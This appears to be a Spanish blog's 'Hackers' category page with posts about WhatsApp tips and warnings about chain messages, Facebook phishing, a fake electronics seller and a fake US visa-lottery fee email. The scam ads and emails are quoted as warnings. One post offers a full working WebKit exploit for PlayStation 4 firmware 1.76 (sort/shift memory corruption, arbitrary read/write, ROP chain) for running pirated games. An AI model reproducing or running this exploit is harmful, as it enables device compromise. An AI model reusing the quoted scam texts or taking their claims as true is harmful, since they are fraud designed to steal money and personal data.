Archivos de la categoría Hackers

Deja de molestarme en WhatsApp

Algunas veces alguna persona no grata se la pasa enviandome mensajes que no son de mi agrado, o que no deseo recibir, y no quiero que esta persona me siga enviando mensajes, o no quiero recibirlos ya.

Este problema tiene una solución simple : Bloquear el contacto en WhatsApp.

Como hacerlo :

  1. Abrir WhatsApp.
  2. Abrir una conversación con el contacto a bloquear.
  3. Hacer clic en el botón de Menú de tu Celular (que abrirá un menú)
  4. Seleccionar Bloquear del menú emergente.

Acción recomendable adicionar a este proceso : Bloquear las llamadas de este número en tu celular.

Como Salir de un Grupo de WhatsApp?

WhatsAppHoy me han agregado a un grupo de WhatsApp sin mi consentimiento. Y al despertar, y ver mi teléfono, veo que tengo decenas, y en casos, centeneres de mensajes.

Sorprendentemente, cuando abro la aplicación para ver de quien es la insistencia que ha enviado tantos mensajes, veo que es un grupo, y que en la mayoría, o por no decir la media de los mensajes o el común denominador de los mensajes es :

Quien eres, quien sos, quien me agregó a este grupo, yo no pedí que me agregaran a este grupo, saquenme de este grupo, saquenme de aquí.  En algunos casos, voy a denunciarlos o voy a llamar a la policía.

Bien, les comento que pueden salir por ustedes mismos de este grupo, y no volver a ver otro mensaje más de estas personas, o de este grupo de personas que no sabe que esta pasando, y que no pidieron que los agregasen al grupo.

El proceso es simple :

  1. Abren WhatsApp.
  2. Seleccionan o abren una conversación con el Grupo.
  3. Abren o pasan a la parte informativa del Contacto del grupo, haciendo clic en el nombre del contacto al inicio de su pantalla, que generalmente es de color verde, con el nombre del grupo o contacto.
  4. Vaya al final de la pantalla, deslizando la pantalla desde abajo hacia arriba, y pasando por todos los integrantes.
  5. Verá un botón de color Rojo que dice “Salir del Grupo“.
  6. Ver la confirmación que en algunos casos no la pide.

Luego de este proceso, notará que ya dejará de recibir nuevos mensajes de este grupo, pero conservará los mensajes ya recibidos.

Si no desea seguir viendo este contacto, puede eliminarlo.

Mensajes de Cadena: ahora en WhatsApp!

WhatsAppRecuerdan aquellos mensajes que se pasaban vía correo electrónico, en los que se hacía eco de que si no lo pasabas a tal cantidad de tus contactos, tu hosting de correos, o la compañia de correos cerraría sus puertas (esto aplicaba mayormente para hotmail.com, msn, messenger, y en menor medida para gmail y yahoo.com) pues resultaba que dichos correos se utilizaban para obtener tu dirección de correo electrónico, y la de tus contactos.

Al parecer estan utilizando la misma técnica, pero en el WhatsApp. Aunque aun no he podido deducir, como pueden obtener tu contacto, o el listado de contactos por el que atraviesa el mensaje, antes de llegar de nuevo a quien lo envió.  Pero, por experiencia, esa es la realidad.

Un ejemplo de estos mensajes es el que sigue :

(Una “Pelotita Azul”) Confirmado… Se nos acaba lo gratis. Manana empiezan a cobrar los mensajes por whatsapp a 0.37 centavos. Reenvia este mensaje a mas de 9 personas de tus contactos y te sera gratuito de por vida, fijate y se pondra verde la pelotita de arriba, hazlo  y veras.

La Realidad es que en paises europeos, las tarifas son :

1 Año   : 0.89 Euros
3 Años  : 2.40 Euros  (10% Descuento)
5 Años  : 3.34 Euros  (25% Descuento)

Que puedes pagar con Google Wallet o con un enlace de pago.

Esto así, “porque no vendemos publicidad” según la compañía.

La verdad es, según el contrato de WhatsApp, que es gratuito el primer año, ya al siguiente deberás pagarlo. Por otro lado, al cambiar de número, tienes derecho a otra cuenta gratuita. Lo que no entiendo, por que despues de 3 años no me han cobrado nunca, ni se ha desactivado mi cuenta, pero la verdad es que ya no recuerdo si en realidad lo he pagado por los 3 o 5 años. Para la mayoría de usuarios en mi país, y en muchos de América Latina, es totalmente gratis.

Te preguntarás, para que querrán mi número de WhatsApp?

La respuesta es muy sencilla : Para enviarte Spams o correo basura.  Y por lo que llegará el momento en que recibirás tantos mensajes, que será insorpotable tener instalado whatsapp en tu teléfono inteligente de Android, Apple o Windows Phone.

Recomendación personal: has caso omiso de dichos mensajes y no los reenvíes, aunque sea un mensaje aparentemente inofensivo.

La curiosidad atrapó al gato! Pishings!

Como funcionan los pishings actualmente :

phishingSencillo, se valen de la curiosidad del usuario para lograrlo. Siempre utilizando personalidades públicas, actores, cantantes, empresarios, y mucha gente sencilla en situaciones extrañas o extraordinarias.

Un ejemplo de esto ha sido el ya famoso video del gobernador del Seibo en República Dominicana, quien grabó un video teniendo relaciones con su entonces concubina o pareja sexual, y de alguna forma este ha llegado a las masas.

Y este es el link mas común de los que he podido ver, en los que se te pide que entres a facebook, aun estes logeado en facebook. Esto con el fin de obtener tus datos de acceso a facebook.  Aquí debajo, les dejo el código detrás del link de descarga de dicho video:

” http://fraternidadvideos.blogspot.com.ar”

Pero detrás de este link, que por cierto, no existe o ya está bloqueado, se esconde este código en html :

<a dir=”ltr” href=”https://l.facebook.com/l.php?u=http%3A%2F%2Ffraternidadvideos.blogspot.com.ar%2F&amp;h=KAQFWJc_A” target=”_blank” rel=”nofollow” data-reactid=”.0.0.2.0:$942198045819493_943172265722071.$right.0.$left.0.1.0.0.0.$range1/=10″>http://fraternidadvideos.blogspot.com.ar</a>

Otro engaño al parecer muy buscado durante mucho tiempo, fue aquel del video del capo dominicano mas buscado, Jose David Figueroa Agosto o Junior Capsula, en el que grabá a varias mujeres, de las cuales, al parecer algunas estubieron casadas y fueron demandadas por sus maridos por aparecer en dichos videos.  No fueron pocos los que aprovecharon este evento para obtener las contraseñas y usuarios de facebook de muchos.

Ah, pero también pasaron por dichos actos personalidades de HollyWood, tales como el video que se filtro de la Sra. Paris Hilton, en donde aparecía teniendo relaciones con su pareja del momento, o los videos de accidentes o maltrechas indumentarias que usaron de vestimentas los artistas como Jennifer Lopez en los que enseña mucha piel (pienso que se veía explosiva) o aquellos videos reales o no en los que se acusa a algun artista de haber hecho algo que ellos nunca han hecho, como aquel rumor o comentario, en el que se dice que Jessica Simpson hizo un video porno o de destape erótico que hizo a muchos incautos caer en la trampa de facebook.

Uno del que se han hecho mucho eco estos distribuidores de rumores, es uno que anda por ahi, en varias modalidades, siempre cambiando el personaje, es el de las novias de algun futbolista famoso (el mismo caso del rumor de Jessica Simpson) en el que se dice que es captada en camara con otro, o que estas estan captadas en videos sexuales con sus parejas. Ahh pero que curiosos.

Otro que si esta logrando mucha atracción es el modelo de denuncias, en el que algún ciudadano denuncia alguna situación que todo el mundo conoce, pero a la que todos se hacen de la vista gorda, y nunca es penada debido a que todos han pecado y no pueden lanzar la primera piedra, y cuando aparece el tonto que lo hace, dicha denuncia, que se hace en los portales de internet para tales fines, se masifica y son aprovechados para engañar a todos los que se pueda.

En la actualidad, facebook se esta encargando de eliminar muchos de estos pishing links, pero al parecer, estan encontrando otras formas de lograr enganchar a los tontos que estan pendientes de la vida de otros.

En la actualidad, no necesitas tener mucha información de una persona para obtener accesos de una persona, solo se necesita que esta persona utilice la misma clave para todos sus accesos o que utilice las mismas respuestas y preguntas para muchos de sus sites de compra. Una vez se tiene su contraseña de correo, se puede solicitar un cambio de clave en la entidad bancaria y … Creo que ya entendieron el punto!!! Tengan cuidado con los clicks que hacen en internet, y no sean tan curiosos.

PS4 firmware downgrade

ps4_linuxPRecientemente he notado que que al actualizar la Playstation 4 o PS4 a su última actualización, los juegos físicos dejaron de funcionar, y al parecer no es mi problema únicamente, si no de muchos usuarios de la consola.

Pues como pude solucionar el problema, ha sido un poco de intuición, y tomar a la ps4 como una computadora de escritorio.  Por lo que simplemente, formatee el disco duro, y eliminé la partición. Instalando, para la consola, un nuevo disco duro. Seguido de ello, solo he de seguir el proceso normal de actualización, o bien, puedo actualizar a la versión que permite jugar con backups de mis discos. Claro, esto invalida la garantía de mi consola si lo hiciera, pero es posible.

Luego de actualizar, podremos descargar de nuevo, todos los juegos digitales ya comprados. Y ahi termina el problema de un firmware con errores.

Muy bueno para ser cierto. Me quieres engañar?

Hace muchos años que vengo siguiendo a este anuncio, o a personas como estas, y vengo denunciando sus tretas.

Esta vez, nuestro ciberdelincuente, pone a la venta un artículo (electrónico generalmente : Consolas de VideoJuegos, Celulares, Laptops y Tables) a un precio increiblemente menor al precio de venta en las demás tiendas reconocidas como Amazon y Ebay.

Galaxy-S6B

Y dice que el dinero de la compra le sea enviado a una dirección de correo electrónico, y si eres de los incautos que envían su dinero (por cierto en dolares americanos) jamas recibirás el artículo que supuestamente compraste.

Para que les quede más claro, el precio de venta de cada artículo es al menos $200 dolares o menos de la mitad del precio real, por lo que deben saber que es un engaño real.

PS4

Esta(s) persona(s) trabaja(n) en paises de América Latina como Ecuador, México, República Dominicana, Perú, Colombia y otros.  En el caso de este anuncio en específico, esta persona, supuestamente llamada Mary Scott, ya tiene más de 5 años en esta actividad.

Aquí les dejo el anuncio actual, les dejo a ustedes investigar los precios reales en Amazon o Ebay.  Y mas debajo un correo de respuesta en donde le pregunto 3 meses antes del lanzamiento de la PS4 sobre el precio sorprendentemente por debajo del precio anunciado de $400 dolares, y esta persona la estaba vendiendo en $300, cuando en la fecha de lanzamiento, nadie tenia uno a la venta, y los que aparecian, estaban por encima de los 500 o 600 dolare y en ocasiones hasta mas de $1,000 dolares.

Si se fijan, notaran que esta persona no habla español e utiliza los servicios del traductor de google sin correcciones.

***********************************************

Anuncio Actual – Julio 2015

**********************************************

Email: cell-wave-electronics@hotmail.com
Skype: mary.scortt2

Compra 2 productos y obtener 1 gratis!!!

Apple iPhone 6 plus 128GB:$500
Apple iPhone 6 plus 64GB:$450
Apple iPhone 6 plus 16GB:$400

Apple Iphone 6 128GB:$450
Apple Iphone 6 64GB:$400

Apple iphone 5s 64gb:$350
Apple iphone 5s 32gb:$300
Apple iphone 5s 16gb:$280

Apple iphone 5c 64gb:$280
Apple iphone 5c 32gb:$270
Apple iphone 5c 16gb:$250

Apple iphone 5 64gb:$260
Apple iphone 5 32gb:$250
Apple iphone 5 16gb:$240

Apple iPad Air 2 Wi-Fi 4G 64GB:$350
Apple iPad Air 2 Wi-Fi 4G 128GB:$400

Microsoft Surface Pro 3 – Wi-Fi – 512GB:$400
Microsoft Surface Pro 3 – Wi-Fi – 256GB:$350

Apple iPad Air LTE (wifi + 4G) 16GB:$300
Apple iPad Air LTE (wifi + 4G) 32GB:$350
Apple iPad Air LTE (wifi + 4G) 64GB:$360
Apple iPad Air LTE (wifi + 4G) 128GB:$370

Apple Ipad 4 Retina (wifi + 4G) 16GB: $200
Apple Ipad 4 Retina (wifi + 4G) 32GB: $230
Apple Ipad 4 Retina (wifi + 4G) 64GB: $250
Apple Ipad 4 Retina (wifi + 4G) 128GB: $280

SAMSUNG GALAXY S6 64GB EDGE GSM :$400
Samsung Galaxy Note Edge :$400
Samsung Galaxy S5 :$300
Samsung Galaxy Note 4 :$350
Samsung Galaxy Note 3 :$300
Samsung Galaxy S4 : $250
Samsung Galaxy S3: $200
Samsung Galaxy S2: $180

BlackBerry Porsche Design P9981: $500
Blackberry Z30:$300
Blackberry Q10:$250
Blackberry Z10:$200
Blackberry Q5:$150

LG G3 4G/LTE 32GB : $300
LG G2 4G/LTE 32GB : $250
LG Nexus 5 4G/LTE 16GB :$300

Nokia Lumia 1020 :$250
Nokia Lumia 925 :$200
Nokia Lumia 920 :$180

Sony Xperia Z3 D6653:$300
Sony Xperia Acro S:$250
Sony D6503 Xperia Z2:$250
Sony Xperia Z1 compact:$220
Sony Xperia Z C6833:$200
Sony Xperia ZQ :$180

HTC One (M9) 4G with 32GB :$350
HTC One M8 32GB :$300
HTC Butterfly X920d :$250
HTC One Android 801s :$200
HTC Butterfly S 901s :$200
HTC One Max 803s 4G :$180

Canon EOS 7D :$400
Canon EOS 50D :$300
Canon EOS 500D :$300
Canon EOS 450D :$280
Canon EOS 5D Mark III :$500
Canon EOS 5D Mark II :$500
Canon EOS 1Ds Mark II :$600

Nikon D3X :$400
Nikon D700 :$300
Nikon D90 :$300
Nikon D300 :$400
Nikon D7000 :$500

Yamaha Tyros 4 (61-Key Pro Arranger Workstation) :$800
Korg Triton Extreme 76 Music Synthesizer Keyboard Workstation :$700
Yamaha Motif XS8 88-Key Keyboard :$700
Yamaha MOTIF XF7 – 76-key Workstation Synthesizer :$750
Roland Fantom-G8 88-key Sampling Synth Workstation :$720
Korg Pa2XPro 76 Key Arranger Keyboard :$600
Nord Stage 2 76 Key Keyboard :$600

Apple 15.4″ MacBook Pro (with Retina Display) Quad-Core Intel Core i7 :$500
Apple 15-inch MacBook Pro with Retina Display (Intel Quad Core i7 :$500
Apple MacBook Pro With Retina display – Core i7 2.7 GHz – 768 GB :$500
Apple MacBook Pro MD213LL/A 13.3″ LED Notebook – Intel Core i5 2 :$600
Apple MacBook Pro ME662LL/A 13.3″ LED Notebook – Intel Core i5 2 :$550
Apple MacBook Pro 15 Inch With Retina display, 2.7GHz Notebook :$500
Apple 15″ I7 Macbook Pro 2.8ghz 16gb 768gb Ssd Retina Display :$600

Apple iMac – 8 GB RAM – 3.2 GHz – 1 TB HDD :$400
Apple iMac MD096LL/A 27-Inch Desktop (NEWEST VERSION) :$450
Apple 27″ Imac 3.4ghz I7 / 2tb+256gb Ssd / 16gb Ram / 2gb :$450
Apple Imac 27″ 2014 I7 512gb Ssd 4tb Hd 32gb Memory 2gb Video 8mb :$500

Television:

Samsung UN65F7100 – 65″ LED Smart TV – 1080p (FullHD)..cost $500usd
LG 55GA7900 – 55″ LED TV – 1080p (FullHD)..cost $500usd
Sharp LC 70LE600U – 70″ LED TV – 1080p (FullHD)..cost $500usd
LG 55LA7400 – 55″ LED Smart TV – 1080p (FullHD)..cost $550usd
Panasonic TC L55ET5 – 55″ LED TV – 1080p (FullHD)..cost $600usd
Panasonic TH 55LRU50 – 55″ Pro:Idiom LED-backlit LCD TV – 1080p.cost $700usd
Samsung UN60ES8000 – 60″ LED Smart TV – 1080p (FullHD)..cost $600usd
Samsung UN65F7100 – 65″ LED Smart TV – 1080p (FullHD)..cost $500usd
LG 55GA7900 – 55″ LED TV – 1080p (FullHD)..cost $500usd
Sharp LC 70LE600U – 70″ LED TV – 1080p (FullHD)..cost $500usd
LG 55LA7400 – 55″ LED Smart TV – 1080p (FullHD)..cost $500usd
Panasonic TC L55ET5 – 55″ LED TV – 1080p (FullHD)..cost $600usd
Panasonic TH 55LRU50 – 55″ Pro:Idiom LED-backlit LCD TV – 1080p….cost $700usd
Sharp Aquos LC-60LE650U 60″ LED HD TV 120Hz Smart TV..cost $500usd
Sharp LC60LE857 60″ 1080p LED TV…650
Sharp LC-60LE650 60-inch Aquos 1080p 120Hz Smart LED HDTV…cost $500usd
SONY Bravia KDL46EX640 46 LED Internet TV…cost $500usd
Samsung UN55EH6000 55 LED HDTV…cost $400usd
Samsung serie 8 UN65ES8000 60 LED HDTV…cost $800usd
Samsung UN55ES7100F 55″ 3D LED SMART TV…cost $900usd
SONY Bravia KDL46EX640 46 LED Internet TV…cost $400usd
LG 55LM9600 55 LED 3D Smart TV…cost $500usd
Samsung UN55ES7100F 55″ 3D LED SMART TV…cost $500usd
Samsung serie 8 UN65ES8000 60 LED HDTV…cost $500usd
Samsung UN55EH6000 55 LED HDTV…cost $400usd
LG 55LM7600 55 Class LED Cinema 3D HDTV…cost $500usd

Musical Instrument:

Soundcraft / Spirit LX7 II – 24 Channel Recording Mixer…400
TASCAM-TEAC America DM-3200 32-Channel Digital Mixing Console…500
Behringer X32 32-Channel 16-bus Total Recall Digital Mixing…500
Behringer PMP4000 / B215XL Powered Mixer Mains & mics Package..400
Behringer X32 32 Channel Motorized Fader Mixer Console …500
Roland V-8 (8-Ch Video Mixer)…400
Edirol / Roland V-440 Hd Multi-format Video Mixer …800
Pioneer DJM-2000 Professional DJ Mixer ….400
Pioneer DJM-1000 96kHz 24BIT Pro Mixer…500
Pioneer CDJ-2000 Professional CD / MP3 Turntable with Software..400

Games:

Sony PlayStation 4 – 500 GB..cost $280usd
Xbox One Ultimate Bundle…cost $280usd
Microsoft Xbox 360 with Kinect – 250 GB..cost $250usd

Compre 2 productos y obtener 1 gratis!!!

Skype: mary.scortt2
Email: cell-wave-electronics@hotmail.com

*******************************************************************

——— Correo recibido al contactar al vendedor ————–

Email vendedor : accurate_alway_electronics_limited@hotmail.com

Nombre : Mary Sandra (posiblemente falso)

*******************************************************************

La nueva marca Sony PlayStation 4-500 GB viene con accesorios completos y es 100 % ok originales.
El coste total de la nueva marca de Sony PlayStation 4-500 GB costará la suma de $ 400USD incluyendo
honorario del envío + IVA + impuestos a su domicilio en República Dominicana .

Tan pronto como usted deposita el dinero a través de MoneyGram enviaremos hacia fuera la
Sony PlayStation 4-500 GB a su domicilio en República Dominicana dentro de los 2 días hábiles (48 horas) .

Aquí está nuestra información de pago de la compañía en EE.UU. a través de MoneyGram a continuación:

Nombre: Tobi Williams
Dirección: 10 N Broadway Ave .
País: USA
Estado : oklahoma
ciudad : oklahoma
Código postal: 73102
Precio total: $ 300usd

Tan pronto como usted hace el pago vía MoneyGram consigue amablemente volver
a nosotros con Scan Copia del comprobante de pago y le enviaremos de inmediato
y volvamos a usted con DHL NÚMERO DE SEGUIMIENTO para que pueda controlar el juego en línea.

Esperamos su confirmación de pago lo antes posible, mañana ( miércoles) y usted recibirá
el Juego en la tarde del viernes .

gracias

Gerente de Ventas .

 

Como Hackear mi PlayStation 4 (PS4 Hack)

Sí, lo han logrado ejecutar copias piratas de juegos en la PlayStation 4 (PS4), a través de un exploit llamado Webkit firmware 1.76. Esto lo han logrado a traves del explorador de internet del Playstation 4 o PS4. En cuanto salga un exploit para el firmware 2.57 de PS4, o el último firmware, de seguro lo descarga en este mismo artículo.

Aqui les dejo el FirmWare 1.76 TestKit de la Playstation 4 (PS4), y el FirmWare 1.76 DevKit, ademas de la Actualizacion del Controlador .

Los archivos dicen en la página que están en :

http://wololo.net/downloads/index.php/download/8230

Pero como han de saber, al parecer de tanto trafico que obtuvo, el sitio cayo.  Y aunque dicen que pueden bajarlo desde ahi, ya no esta disponible por problemas de performance.

He logrado encontrar los archivos necesarios para lograr este hack, y los he subido para descargar en este link propio que si funciona : ps4_176_poc .

h1b

 

Su versión del firmware deberá ser la 1.76.

Les recuerdo, que modificar su PS4 en este caso, inválida su garantía.  Dicho esto, les dejo el código fuente de un dump o backup para hackear y/o ejecutar el exploit en la PlayStation 4 (PS4). Solo en caso de alguno de ustedes entienda algo de lo que dice!

Y no garantizo que funcione, eso se los dejo a aquellos aventureros que quieran probar con su ps4.

 

<html>
<body>
<h2>PS4 POC</h2><h3>by nas and Proxima</h3></br>
<script src=”inc/utils.js”></script>
<script src=”inc/jquery.js”></script>
<script type=”text/javascript”>

// global vars
var _gc, _cnt = 0;

function tryExplMac64(att)
{
try {
//
// Part 1: getting the Uint32Array object address
//
// init vars
var u32 = new Uint32Array(0x100);
var a1 = [0,1,2,3,u32];
var a2 = [0,1,2,3,4]; // right after a1
var a1len = a1.length;
var a2len = a2.length;
var u32len = u32.length;

// protect local vars from GC // for gdb
if (!_gc) _gc = new Array();
_gc.push(u32,a1,a2);

// declare custom compare function
var myCompFunc = function(x,y)
{
// check for the last call for last two array items
if (y == 3 && x == u32) {
//logAdd(“myCompFunc(u32,3)”);
// shift() is calling during sort(), what causes the
// last array item is written outside the array buffer
a1.shift();
}
return 0;
}

// call the vulnerable method – JSArray.sort(…)
a1.sort(myCompFunc);

// check results: a2.length should be overwritten by a1[4]
var len = a2.length;
//logAdd(“a2.length = 0x” + len.toString(16));
if (len == a2len) { logAdd(“error: 1”); return 1; }

//
// Part 2: creating corrupted JSValue which points to the (u32+0x18) address
//

// modify our compare function
myCompFunc = function(x,y)
{
if (y == 0 && x == 1) {
//logAdd(“myCompFunc(1,0)”);
// call shift() again to read the corrupted JSValue from a2.length
// into a1[3] on the next sort loop
a1.length = a1len;
a1.shift();
// modify JSValue
a2.length = len + 0x18;
}
if (y == 3) {
//logAdd(“myCompFunc(x,3)”);
// shift it back to access a1[3]
a1.unshift(0);
}
return 0;
}

a1.sort(myCompFunc);

// now a1[3] should contain the corrupted JSValue from a2.length (=len+0x18)
var c = a2.length;
//logAdd(“a2.length = 0x” + c.toString(16));
if (c != len + 0x18) { logAdd(“error: 2”); a1[3] = 0; return 2; }

//
// Part 3: overwriting ((JSUint32Array)u32).m_impl pointer (see JSCTypedArrayStubs.h)
//

// generate dummy JS functions
var f, f2, f2offs, f2old, funcs = new Array(30);
c = funcs.length;
for(var i=0; i < c; i++){
f = new Function(“arg”, ” return 876543210 + ” + (_cnt++) + “;”);
f.prop2 = 0x12345600 + i;
funcs[i] = f;
}

// generate JIT-code
for(var i=c-1; i >= 0; i–) { funcs[i](i); }

// prepare objects for the third sort() call
var mo = {};
var pd = { set: funcs[0], enumerable:true, configurable:true }
var a3 = [0,1,2,a1[3]];

// allocate mo’s property storage right after a3’s buffer
Object.defineProperty(mo, “prop0”, pd);
for(var i=1; i < 5; i++){
mo[“prop”+i] = i;
}

// protect from GC
_gc.push(a3,mo,funcs);

// use sort-n-shift technique again
myCompFunc = function(x,y)
{
// check for the last call for two last array items
if (y == 2) {
//logAdd(“myCompFunc(a3[3],2)”);
// a3[3] will be written over the mo.prop0 object
a3.shift();
}
return 0;
}

// overwrite mo.prop0 by a3[3] = a1[3] = &u32+0x18
a3.sort(myCompFunc);

// u32.prop1 has 0x20 offset inside u32, and 0x08 inside mo.prop0 GetterSetter object.
// we should put some valid pointers into GetterSetter
u32.prop1 = u32;     // GetterSetter.m_structure
u32.prop2 = 8;         // 8 = JSType.GetterSetterType
u32.prop1 = a1[3];  // bypass JSCell::isGetterSetter()

// clear corrupted JSValue
a1[3] = 0; a3[3] = 0;

// overwrite u32.m_impl by some JSFunction object
f = funcs[c-5];
pd.set = f;
Object.defineProperty(mo, “prop0”, pd);

// check results: u32.length is taken from f’s internals now
//logAdd(“u32.length = 0x” + u32.length.toString(16));
if (u32.length == u32len) { logAdd(“error: 3”); return 3; }

//
//  Part 4: getting the JIT-code memory address
//

// declare aux functions
var setU64 = function(offs, val) {
u32[offs]   = val % 0x100000000;
u32[offs+1] = val / 0x100000000;
}
var getU64 = function(offs) {
return u32[offs] + u32[offs+1] * 0x100000000;
}
var getU32 = function(offs) {
return u32[offs];
}
var getObjAddr = function(obj) {
// write obj into u32 data
pd.set.prop2 = obj;
// read obj address from u32
return getU64(2);
}

// get the memory address of u32
var u32addr = getObjAddr(u32);
//logAdd(“u32 address = 0x” + u32addr.toString(16));
// get the memory address of u32[0] (ArrayBufferView.m_baseAddress)
var u32base = getObjAddr(pd.set) + 0x20;
var u32base0 = u32base;
//logAdd(“u32 base = 0x” + u32base.toString(16));

// on x64 platforms we can’t just set u32.length to the huge number
// for ability to access arbitrary addresses. We should be able to
// modify the u32’s buffer pointer on-the-fly.
var setBase = function(addr){
if (!f2) {
// search for another JSFunction near “f”
for(var i=0x12; i < 0x80; i+=0x10){
if ((u32[i] >>> 8) == 0x123456) {
f2 = funcs[u32[i] & 0xFF];
f2offs = i – 6;
f2old = getU64(f2offs);
break;
}
}
logAdd(“f2offs = 0x” + f2offs);
if (!f2) { return false; }

}
if (pd.set != f) {
pd.set = f;
Object.defineProperty(mo, “prop0”, pd);
u32base = u32base0;
}
if (addr == null) return true;

// this will be the new value for ((ArrayBufferView)u32).m_baseAddress
setU64(f2offs, addr);

// overwrite ((JSUint32Array)u32).m_impl again
pd.set = f2;
Object.defineProperty(mo, “prop0”, pd);

u32base = addr;
//logAdd(“u32 new base = 0x” + u32base.toString(16));

return true;
}

// read/write the 64-bit value from the custom address
var getU64from = function(addr) {
if (addr < u32base || addr >= u32base + u32len*4) {
if (!setBase(addr)) return 0;
}
return getU64((addr – u32base) >>> 2);
}
var setU64to = function(addr,val) {
if (addr < u32base || addr >= u32base + u32len*4) {
if (!setBase(addr)) return 0;
}
return setU64((addr – u32base) >>> 2, val);
}

//logAdd(“u32 size: 0x” + u32.length.toString(16));

// Get the object table from the origianl heap address
// +0x20 is a pointer we can use for some object

var xx = getU64from(u32base0+0x20);
var yy=0;
//logAdd(“verify base: 0x”+xx.toString(16) );

//
// This is the only part you need to modify
//
//
//
// First, the heap array has a pointer into a function
// in WebKit2. The one I’m using is always at +0x20 from
// the original base at +0x20.

// 1.70 PS4 = -0x30bf0 is the start of webkit

// +0x25C4000 = some data
// +0x2414000 = import table
// (import table +0x20) =  modules table
// If this crashes, try it 2-4 more times. It usually will work

// target addr for the rop chain

var chain_addr = u32base0 + 0x80000;
var chain_data = u32base0 + 0x88000;

// xx will be the base address of WebKit2

xx = (getU64from(xx+0x20)-0x30bf0);
var wk_base = xx;
logAdd(“WebKit2 base address = 0x” + xx.toString(16));
xx += 0x2414000; // Get to the import table
setBase(xx);

xx = getU64from(xx+0x20); // Get to the module table
// Future use: data area somewhere around 0x200500000

//logAdd(“Dump Address is 0x” + xx.toString(16));

setBase(xx);

//get libSceLibcinternal base
//var libc_int_base = getU64from(xx+0xf98); //1.71
var libc_int_base = getU64from(xx+0x1628); //1.71

//get libkernel base
//xx = getU64from(xx+0xdd8); //1.71
xx = getU64from(xx+0x1468); //1.76
var libkernel_base = xx;

setBase(xx);

//get stack base
//xx = getU64from(xx+0x3D890); //1.76 webkit2 stack?
xx = getU64from(xx+0x5B278); //1.76 webprocess stack
//yy = getU64from(xx+0x5AA70); //1.71
var stack_base = xx – 0x4000;
//yy = getU64from(xx+0x5AA70);

logAdd(“libkernel Base is 0x” + libkernel_base.toString(16));
logAdd(“libSceLibcinternal Base is 0x” + libc_int_base.toString(16));
logAdd(“Stack Base is 0x” + stack_base.toString(16));
logAdd(“Chain Address is 0x” + chain_addr.toString(16));

//var return_va = 0x2b38; //1.71
var return_va = 0x2b38; //1.76
//var old_va = getU64from(return_va);
//var old_va8 = getU64from(return_va+8);

// ***************** ROP START *********************

// store data
// none
// store ROP chain
setU64to(chain_addr + 0, wk_base + 735703);
// point a return address of the stack to our chain
setU64to(stack_base + return_va + 8, chain_addr);
setU64to(stack_base + return_va, wk_base + 392117);

// ***************** ROP END ***********************

// cleanup

// restore f2 object
if (f2old) {
setBase(null); setU64(f2offs, f2old);
}

// delete corrupted property
delete mo.prop0;

}
catch(e) {
logAdd(e);
}

return 0;
}

// “Start” button onclick handler
function btnClick()
{
try {
logAdd(“======== Start ========”);

// check OS version
//if (navigator.platform != “MacIntel”) { logAdd(“<font color=red>This works for Mac OS X only!</>”); return; }

// try several attempts to exploit
for(var i=1; i < 5; i++){
logAdd(“<br/>Attempt #” + i + “:”);
if (tryExplMac64(i) == 0) break;
}

logAdd(“<br/>========&nbsp;End &nbsp;========<br/><br/>”);
}
catch(e) {
logAdd(e);
}

_log = null;
}

// print environment info
writeEnvInfo();

</script>

<button style=”width:100px;” onclick=”btnClick();”>Start</button>
<br/><br/>
<div id=”log”></div><br>
</body>
</html>

 

Lotería del engaño : Pishing Mails!

Muchas veces debes de haber recibido algun correo con alguna noticia demasiado buena para ser cierta. Pues tu intuición tiene razón! Es demasiado buena para ser verdad, y no es verdad, por más real que te parezca.

Un ejemplo de esto es este correo, que a fin de cuentas dice que has sido seleccionado para un programa de visa en Estados Unidos.

Cuando le das al link proporcionado por el correo te redirige a una página de captación de información, y por supuesto, en la siguiente página, luego de enviar la información le piden que le sea enviado dinero (solo un poquito : al menos $875 dolares americanos por cada miembro de tu familia) junto con su información personal como su ID de identificación o Pasaporte en formato JPG, Gif o cualquier formato estandar de imágenes. Y luego le seran suministrada la forma de pago, y por cierto, si no puede pagar dentro de los próximos 7 dias laborables, no envie la solicitud! Que tiernitos? Si te ilusionas, o estas tan necesitado que no te detienes a pensar solo unos 5 segundos o menos, te puede costar un buen dinerito, y ya con tu ID (el cual no podras cambiar) podrán intentar y lo haran, alguna transacción para embaucarte aun más.

  • Estas son las Instrucciones dada por la pagina para aplicar al programa de visado de Estados Unidos (que lindos) !
U.S. Department of State Bureau of Consular Affairs Banner

INSTRUCTIONS FOR THE DIVERSITY IMMIGRANT VISA PROGRAM

You have been selected at random from over 12.1 million qualified entries (16.5 million with derivatives) received. The diversity lottery was conducted under the terms of section 203(c) of the Immigration and Nationality Act which makes available 50,000 permanent resident visas annually to persons from countries with low rates of immigration to the United States.

The annual DV program makes visas available to persons meeting simple, but strict, eligibility requirements. The Department of State implemented the electronic fees processing system beginning with DV-2005 in order to make the DV process more efficient and secure.

With the Diversity Visa (also known as Green Card) you will enjoy all the advantages and benefits of a U.S. permanent resident, including health and education benefits, and employment opportunities along with guidance in your new country, orientation sessions and programs to integrate into mainstream American society. Once received you can use it at any time you want to move in the United States or just travel.

U.S. Government helps you with the accommodation and offers you Health Insurance (Freedom HSA Direct Individual Health insurance for 1 year), Dwelling (Apartment in any city you prefer, 1 bedroom for 3 months ), a guaranteed job (in the field that you are are currently qualified so you can start working even from the first week you arrive in the United States and get paid as U.S citizen. ) and education (for U.S. Students or Higher Education through Education USA. It includes transfer to a U.S college or University so you can continue your educational study.

PROCESSING FEES :

Is the Diversity Visa FREE ?

No. There is a big confusion. Only the participation in the Diversity Visa Lottery was free but the winners must pay the visa processing fees.

United States Permanent Resident Card Granted! – Waiting for payment of processing fee US $875.00

Although the Diversity Visa participation was free, the law and regulations require to every diversity visa winner to pay a visa processing fee of US $875.00. The Diversity Visa (Green Card) is guaranteed upon receiving the payment. The per person fee for each Diversity Visa is US $875.00, payable in U.S. dollars or equivalent of your local currency. This US $875.00 fee is the only fee a winner needs to pay throughout the entire relocation process. Accompanying family members (wife/husband, fiancee, brothers, sisters, children, cousins) may be included in the program and their visas will be provided at the same time with yours so you can travel/move together in the same time. However the fees must be paid per person and each member(e.g wife, brother, parents, children, cousin) must pay US $875.00. There is no discount for children.

Please note that you are allowed to take with you as many family members you want. If your marital status has changed (you have a domestic partner or you got married) from the time you applied for the Green Card you can apply for your new family members. However for each person you must pay an additional amount of US $875.00. For example if you decide to move in the United States with your wife and a kid the total fee is US $875.00 (your fee) + US $875.00 (your wife’s fee) + US $875.00 (your kid’s fee) = US $2,625.00.

